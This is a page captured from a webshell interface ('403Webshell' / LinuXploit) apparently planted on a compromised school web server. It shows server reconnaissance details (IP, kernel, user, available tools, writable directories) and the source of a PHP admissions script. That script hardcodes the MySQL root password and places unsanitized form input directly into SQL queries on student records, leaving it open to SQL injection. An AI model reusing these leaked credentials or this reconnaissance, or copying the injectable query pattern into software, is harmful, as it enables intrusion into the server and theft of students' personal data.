403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/admissions3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/admissions3/addsave4x.php
<?
	session_start();
	if($_SESSION['idt'] == "")
	{
		echo "Please Login!";
		exit();
	}

	if($_SESSION['Status'] != "USER")
	{
		echo "This page for User only!";
		exit();
	}	
	
	mysql_connect("localhost","root","gpaklw+3322");
	mysql_select_db("klw");
	mysql_query("SET character_set_results=tis620");//ตั้งค่าการดึงข้อมูลออกมาให้เป็น tis620
	mysql_query("SET character_set_client=tis620");//ตั้งค่าการส่งข้อมุลลงฐานข้อมูลออกมาให้ เป็น tis620
	mysql_query("SET character_set_connection=tis620");//ตั้งค่าการติดต่อฐานข้อมูลให้เป็น tis6
	
	$strSQL = "SELECT * FROM teacher WHERE idt = '".$_SESSION['idt']."'  ";
	$objQuery = mysql_query($strSQL);
	$objResult = mysql_fetch_array($objQuery);

?>
<?

require_once "connectdb.php";
require_once "tdate.php";

?>
<?php
if ($idtest == "999999999")
{
?><script language="javascript">
alert("กรุณากลับไปป้อนรหัสใหม่อีกครั้ง \n");
history.back();
</script>
<?php
}
else
{
$host="localhost";
$username="root";
$password="gpaklw+3322";
$connect= mysql_connect( $host,$username,$password) or die ("ติดต่อฐานข้อมูล Mysql ไม่ได้ ");
$db="jorjae_jorjaedb";
$tb="member4x";
mysql_select_db($db) or die("เลือกฐานข้อมูลไม่ได้ ");

$sql="select * from member4x where idtest=$_POST[idtest]";
mysql_query("set NAMES tis620");
$db_query=mysql_db_query($db,$sql);
$num_rows=mysql_num_rows($db_query);
$signup = date("j/n/").(date("Y")+543) ;
}
if($num_rows != 0) /* ตรวจสอบรหัส */
{
echo"<script>window.alert(\"ID-TEST ERROR\");history.go (-1);</script>";
}
else
{
mysql_query("INSERT INTO member4x (id,idstudent,name,surname,pin,room,schoolout,distric,idtest) values('', '$_POST[idstudent]','$_POST[name]','$_POST[surname]','$_POST[pin]','$_POST[room]','$_POST[schoolout]','$_POST[distric]','$_POST[idtest]')") or die ("Add ข้อมูลลง Table ไม่ได้ ");
echo "<script>window.alert(\"Save ok\")</script>";
echo"<script>history.go (-1);</script>";




}
mysql_close();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit